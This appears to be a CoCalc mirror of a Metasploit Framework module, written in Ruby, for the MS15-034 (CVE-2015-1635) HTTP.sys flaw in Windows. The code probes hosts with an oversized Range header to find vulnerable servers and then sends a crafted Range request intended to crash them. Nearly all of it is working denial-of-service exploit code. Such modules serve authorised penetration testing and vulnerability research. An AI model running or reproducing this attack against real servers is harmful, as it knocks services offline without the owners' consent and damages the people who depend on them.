Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  # Watch out, dos all the things

9
  include Msf::Auxiliary::Scanner

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::Dos

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service',

18
        'Description' => %q{

19
          This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a

20
          vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code

21
          execution. This module will try to cause a denial-of-service.

22
        },

23
        'Author' => [

24
          # Bill did all the work (see the pastebin code), twitter: @hectorh56193716

25
          'Bill Finlayson',

26
          # MSF. But really, these people made it happen:

27
          # https://github.com/rapid7/metasploit-framework/pull/5150

28
          'sinn3r'

29
        ],

30
        'References' => [

31
          ['CVE', '2015-1635'],

32
          ['MSB', 'MS15-034'],

33
          ['URL', 'https://pastebin.com/ypURDPc4'],

34
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],

35
          ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],

36
          ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']

37
        ],

38
        'License' => MSF_LICENSE,

39
        'Notes' => {

40
          'Stability' => [CRASH_SERVICE_DOWN],

41
          'SideEffects' => [],

42
          'Reliability' => []

43
        }

44
      )

45
    )

46


47
    register_options(

48
      [

49
        OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])

50
      ]

51
    )

52
  end

53


54
  def upper_range

55
    0xFFFFFFFFFFFFFFFF

56
  end

57


58
  def run_host(ip)

59
    if check_host(ip) == Exploit::CheckCode::Vulnerable

60
      dos_host(ip)

61
    else

62
      print_status('Probably not vulnerable, will not dos it.')

63
    end

64
  end

65


66
  # Needed to allow the vulnerable uri to be shared between the #check and #dos

67
  def target_uri

68
    @target_uri ||= super

69
  end

70


71
  def get_file_size(_ip)

72
    @get_file_size ||= lambda {

73
      file_size = -1

74
      uri = normalize_uri(target_uri.path)

75
      res = send_request_raw('uri' => uri)

76


77
      unless res

78
        vprint_error('Connection timed out')

79
        return file_size

80
      end

81


82
      if res.code == 404

83
        vprint_error('You got a 404. URI must be a valid resource.')

84
        return file_size

85
      end

86


87
      file_size = res.body.length

88
      vprint_status("File length: #{file_size} bytes")

89


90
      return file_size

91
    }.call

92
  end

93


94
  def dos_host(ip)

95
    file_size = get_file_size(ip)

96
    lower_range = file_size - 2

97


98
    # In here we have to use Rex because if we dos it, it causes our module to hang too

99
    uri = normalize_uri(target_uri.path)

100
    begin

101
      cli = Rex::Proto::Http::Client.new(ip)

102
      cli.connect

103
      req = cli.request_raw(

104
        'uri' => uri,

105
        'method' => 'GET',

106
        'headers' => {

107
          'Range' => "bytes=#{lower_range}-#{upper_range}"

108
        }

109
      )

110
      cli.send_request(req)

111
    rescue ::Errno::EPIPE, ::Timeout::Error

112
      # Same exceptions the HttpClient mixin catches

113
    end

114
    print_status('DOS request sent')

115
  end

116


117
  def potential_static_files_uris

118
    uri = normalize_uri(target_uri.path)

119


120
    return [uri] unless uri[-1, 1] == '/'

121


122
    uris = ["#{uri}welcome.png"]

123
    res = send_request_raw('uri' => uri, 'method' => 'GET')

124


125
    return uris unless res

126


127
    site_uri = URI.parse(full_uri)

128
    page = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))

129


130
    page.xpath('//link|//script|//style|//img').each do |tag|

131
      %w[href src].each do |attribute|

132
        attr_value = tag[attribute]

133


134
        next unless attr_value && !attr_value.empty?

135


136
        uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip))

137


138
        next unless uri.host == vhost || uri.host == rhost

139


140
        uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file

141
      end

142
    end

143


144
    uris.uniq

145
  end

146


147
  def check_host(_ip)

148
    potential_static_files_uris.each do |potential_uri|

149
      uri = normalize_uri(potential_uri)

150


151
      res = send_request_raw(

152
        'uri' => uri,

153
        'method' => 'GET',

154
        'headers' => {

155
          'Range' => "bytes=0-#{upper_range}"

156
        }

157
      )

158


159
      vmessage = "#{peer} - Checking #{uri}"

160


161
      if res && res.body.include?('Requested Range Not Satisfiable')

162
        vprint_status("#{vmessage} [#{res.code}] - Vulnerable")

163


164
        target_uri.path = uri # Needed for the DoS attack

165


166
        return Exploit::CheckCode::Vulnerable

167
      elsif res && res.body.include?('The request has an invalid header name')

168
        vprint_status("#{vmessage} [#{res.code}] - Safe")

169


170
        return Exploit::CheckCode::Safe

171
      else

172
        vprint_status("#{vmessage} - Unknown")

173
      end

174
    end

175


176
    Exploit::CheckCode::Unknown

177
  end

178
end

179


180